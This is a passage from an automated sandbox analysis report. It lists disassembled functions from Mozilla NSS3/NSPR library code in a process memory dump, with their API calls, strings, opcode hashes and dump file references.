                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Lock$CountCriticalErrorInitializeLastSectionSpincallocfree
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1407103528-0
                                                                                                                                                                                                                                                      • Opcode ID: 302e6992f06773e5d7025341ff11150cbfff8da63c33b9b7aacdf6fa18f6d96f
                                                                                                                                                                                                                                                      • Instruction ID: 2d1ffa3bc491ba0499827944e7cbd2953a946f40b2c36cb931db85f8d7026df9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 302e6992f06773e5d7025341ff11150cbfff8da63c33b9b7aacdf6fa18f6d96f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F31E4F0E01724DE8B85DF25CD481897BB4B7D6A0A712611ADC1887701EBB42D4ACFDE
                                                                                                                                                                                                                                                      Function 6C506E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C506BF7), ref: 6C506EB6
                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: TlsGetValue.KERNEL32(00000040,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461267
                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: EnterCriticalSection.KERNEL32(?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C46127C
                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461291
                                                                                                                                                                                                                                                        • Part of subcall function 6C461240: PR_Unlock.NSS3(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C4612A0
                                                                                                                                                                                                                                                      • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C5AFC0A,6C506BF7), ref: 6C506ECD
                                                                                                                                                                                                                                                      • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C506EE0
                                                                                                                                                                                                                                                      • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C506EFC
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6C506F04
                                                                                                                                                                                                                                                      • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C506F18
                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C506BF7), ref: 6C506F30
                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C506BF7), ref: 6C506F54
                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C506BF7), ref: 6C506FE0
                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C506BF7), ref: 6C506FFD
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C506F4F
                                                                                                                                                                                                                                                      • NSS_SSL_CBC_RANDOM_IV, xrefs: 6C506FF8
                                                                                                                                                                                                                                                      • SSLFORCELOCKS, xrefs: 6C506F2B
                                                                                                                                                                                                                                                      • # SSL/TLS secrets log file, generated by NSS, xrefs: 6C506EF7
                                                                                                                                                                                                                                                      • NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C506FDB
                                                                                                                                                                                                                                                      • SSLKEYLOGFILE, xrefs: 6C506EB1
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
                                                                                                                                                                                                                                                      • String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
                                                                                                                                                                                                                                                      • API String ID: 412497378-2352201381
                                                                                                                                                                                                                                                      • Opcode ID: 247c5aed71cb3664476af36d786226cc18cc9a8b31dbc6a32a1abb75d0856f58
                                                                                                                                                                                                                                                      • Instruction ID: f646a159f3b5f341656e229e154041c7b45ee7d81e1ade23ae18aad620b9811d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 247c5aed71cb3664476af36d786226cc18cc9a8b31dbc6a32a1abb75d0856f58
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88A12DB2B55E9187F7109A3CCC0178437B2ABD33A9F59476AEC31C7ED8DB75A4808249
                                                                                                                                                                                                                                                      Function 6C485DB0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 238memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C485DEC
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6C485E0F
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(00000828), ref: 6C485E35
                                                                                                                                                                                                                                                      • SECKEY_CopyPublicKey.NSS3(?), ref: 6C485E6A
                                                                                                                                                                                                                                                      • HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6C485EC3
                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6C485ED9
                                                                                                                                                                                                                                                      • SECKEY_SignatureLen.NSS3(?), ref: 6C485F09
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6C485F49
                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C485F89
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C485FA0
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C485FB6
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C485FBF
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C48600C
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C486079
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C486084
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C486094
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2310191401-3916222277
                                                                                                                                                                                                                                                      • Opcode ID: 9fe49594a336c0579bf9c0884c4cfe4fc3cf11d70488fb2550e0662188041684
                                                                                                                                                                                                                                                      • Instruction ID: db78d8e9841570972076eacfd68ed77c1d9354c39d745715965fae66a80b9cc6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9fe49594a336c0579bf9c0884c4cfe4fc3cf11d70488fb2550e0662188041684
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F281E3B1E022059BEB10CF68CC84FAE77B5AF44319F144128E91AA7B91E731E905CBE1
                                                                                                                                                                                                                                                      Function 6C45B860 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 174COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000144,?,?,?,?,?,6C45B45E,?,?,?,?,?,?,?,?), ref: 6C45B87D
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C45B8FE
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C45B912
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C45B959
                                                                                                                                                                                                                                                      • _PR_MD_UNLOCK.NSS3(?), ref: 6C45B977
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,0000002C), ref: 6C45B983
                                                                                                                                                                                                                                                      • PR_NewCondVar.NSS3 ref: 6C45B9B9
                                                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(-00000040,000005DC,?,?), ref: 6C45BA54
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6C45BA5F
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE890,00000000), ref: 6C45BA77
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 6C45BA96
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C45BA9D
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C45BAB3
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 6C45BACD
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C45BAD4
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSection$free$DeleteErrorValuecalloc$CondCountEnterInitializeLastSpin
                                                                                                                                                                                                                                                      • String ID: T ]l$X ]l
                                                                                                                                                                                                                                                      • API String ID: 1841981668-1146210263
                                                                                                                                                                                                                                                      • Opcode ID: f5da456036ce2c5ff4e58ca311257d0f721d65bcc67c6ab6c63eff41684e70ec
                                                                                                                                                                                                                                                      • Instruction ID: f6867949943837ec95b402305c2d23edc9007851554a70aaa03fd70892c99291
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f5da456036ce2c5ff4e58ca311257d0f721d65bcc67c6ab6c63eff41684e70ec
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1051CBB4A007019FEB10DF29CC48F5A7BF4BF09309F41852DE85A86B41EB31E965CB99
                                                                                                                                                                                                                                                      Function 6C46F850 Relevance: 28.3, APIs: 10, Strings: 6, Instructions: 262COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE004,00000000), ref: 6C46F86F
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(%lu,?), ref: 6C46F899
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(%s.%lu,00000000,?), ref: 6C46FA4E
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(%s.%llu,00000000,00000000,00000000), ref: 6C46FAA2
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(%s.UNSUPPORTED,00000000), ref: 6C46FAB6
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C46FAC1
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(OID.UNSUPPORTED), ref: 6C46FAD3
                                                                                                                                                                                                                                                      • __aulldiv.LIBCMT ref: 6C46FB00
                                                                                                                                                                                                                                                      • PR_smprintf.NSS3(OID.%llu.%llu,00000000,?,00000000,FFFFFFD8,00000000,00000000,00000028,00000000), ref: 6C46FB4B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: R_smprintf$ErrorValue__aulldivfree
                                                                                                                                                                                                                                                      • String ID: %s.%llu$%s.%lu$%s.UNSUPPORTED$OID.%llu.%llu$OID.%lu.%lu$OID.UNSUPPORTED
                                                                                                                                                                                                                                                      • API String ID: 2145857551-3523515424
                                                                                                                                                                                                                                                      • Opcode ID: c7e11f6c0ee31394159a167705b64f1a3fe275072121f76ccd70b877dc6402ba
                                                                                                                                                                                                                                                      • Instruction ID: d92bfe487689e9c8e362b5263512649bf51c218684b09eb15f9a333a8badb930
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7e11f6c0ee31394159a167705b64f1a3fe275072121f76ccd70b877dc6402ba
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0817E72E160314BFB08CB6E8C55F7E7FA29BC5305F1841A9E8A1DBF4DD670880583A1
                                                                                                                                                                                                                                                      Function 6C589C60 Relevance: 27.2, APIs: 18, Instructions: 202threadCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000080), ref: 6C589C70
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6C589C85
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
                                                                                                                                                                                                                                                      • PR_NewCondVar.NSS3(00000000), ref: 6C589C96
                                                                                                                                                                                                                                                        • Part of subcall function 6C45BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C4621BC), ref: 6C45BB8C
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6C589CA9
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C539946
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C3F16B7,00000000), ref: 6C53994E
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: free.MOZGLUE(00000000), ref: 6C53995E
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6C589CB9
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6C589CC9
                                                                                                                                                                                                                                                      • PR_NewCondVar.NSS3(00000000), ref: 6C589CDA
                                                                                                                                                                                                                                                        • Part of subcall function 6C45BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C45BBEB
                                                                                                                                                                                                                                                        • Part of subcall function 6C45BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C45BBFB
                                                                                                                                                                                                                                                        • Part of subcall function 6C45BB80: GetLastError.KERNEL32 ref: 6C45BC03
                                                                                                                                                                                                                                                        • Part of subcall function 6C45BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C45BC19
                                                                                                                                                                                                                                                        • Part of subcall function 6C45BB80: free.MOZGLUE(00000000), ref: 6C45BC22
                                                                                                                                                                                                                                                      • PR_NewCondVar.NSS3(?), ref: 6C589CF0
                                                                                                                                                                                                                                                      • PR_NewPollableEvent.NSS3 ref: 6C589D03
                                                                                                                                                                                                                                                        • Part of subcall function 6C57F3B0: PR_CallOnce.NSS3(6C5D14B0,6C57F510), ref: 6C57F3E6
                                                                                                                                                                                                                                                        • Part of subcall function 6C57F3B0: PR_CreateIOLayerStub.NSS3(6C5D006C), ref: 6C57F402
                                                                                                                                                                                                                                                        • Part of subcall function 6C57F3B0: PR_Malloc.NSS3(00000004), ref: 6C57F416
                                                                                                                                                                                                                                                        • Part of subcall function 6C57F3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6C57F42D
                                                                                                                                                                                                                                                        • Part of subcall function 6C57F3B0: PR_SetSocketOption.NSS3(?), ref: 6C57F455
                                                                                                                                                                                                                                                        • Part of subcall function 6C57F3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6C57F473
                                                                                                                                                                                                                                                        • Part of subcall function 6C539890: TlsGetValue.KERNEL32(?,?,?,6C5397EB), ref: 6C53989E
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C589D78
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,0000000C), ref: 6C589DAF
                                                                                                                                                                                                                                                      • _PR_CreateThread.NSS3(00000000,6C589EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6C589D9F
                                                                                                                                                                                                                                                        • Part of subcall function 6C45B3C0: TlsGetValue.KERNEL32 ref: 6C45B403
                                                                                                                                                                                                                                                        • Part of subcall function 6C45B3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6C45B459
                                                                                                                                                                                                                                                      • _PR_CreateThread.NSS3(00000000,6C58A060,00000000,00000001,00000001,00000000,?,00000000), ref: 6C589DE8
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,0000000C), ref: 6C589DFC
                                                                                                                                                                                                                                                      • _PR_CreateThread.NSS3(00000000,6C58A530,00000000,00000001,00000001,00000000,?,00000000), ref: 6C589E29
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,0000000C), ref: 6C589E3D
                                                                                                                                                                                                                                                      • _PR_MD_UNLOCK.NSS3(?), ref: 6C589E71
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE890,00000000), ref: 6C589E89
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4254102231-0
                                                                                                                                                                                                                                                      • Opcode ID: befbb0a00965b7c60c37624d99d04ef4240ca21ba001fe762380efde82d49cfc
                                                                                                                                                                                                                                                      • Instruction ID: 49ef83f04e77124537cfc4517aa180c7ac58b3f600bfc5f650a02692b905b40a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: befbb0a00965b7c60c37624d99d04ef4240ca21ba001fe762380efde82d49cfc
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98614DB1A01716AFD710DF75CC44AA7BBE8FF48208B04452DE859C7B11EB70E914CBA1
                                                                                                                                                                                                                                                      Function 6C483FF0 Relevance: 27.2, APIs: 18, Instructions: 201memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SECKEY_CopyPublicKey.NSS3(?), ref: 6C484014
                                                                                                                                                                                                                                                        • Part of subcall function 6C4839F0: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C485E6F,?), ref: 6C483A08
                                                                                                                                                                                                                                                        • Part of subcall function 6C4839F0: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6C485E6F), ref: 6C483A1C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4839F0: memset.VCRUNTIME140(-00000004,00000000,000000A8,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C483A3C
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6C484038
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6C48404D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(00000000,-0000001C,00000000,6C59A0F4), ref: 6C4840C2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C4CF0C8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4CF122
                                                                                                                                                                                                                                                      • SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,00000010,00000000), ref: 6C48409A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C47E708,00000000,00000000,00000004,00000000), ref: 6C4CBE6A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C4804DC,?), ref: 6C4CBE7E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C4CBEC2
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4840DE
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4840F4
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C484108
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,?,00000010), ref: 6C48411A
                                                                                                                                                                                                                                                      • SECOID_SetAlgorithmID_Util.NSS3(00000000,00000004,000000C8), ref: 6C484137
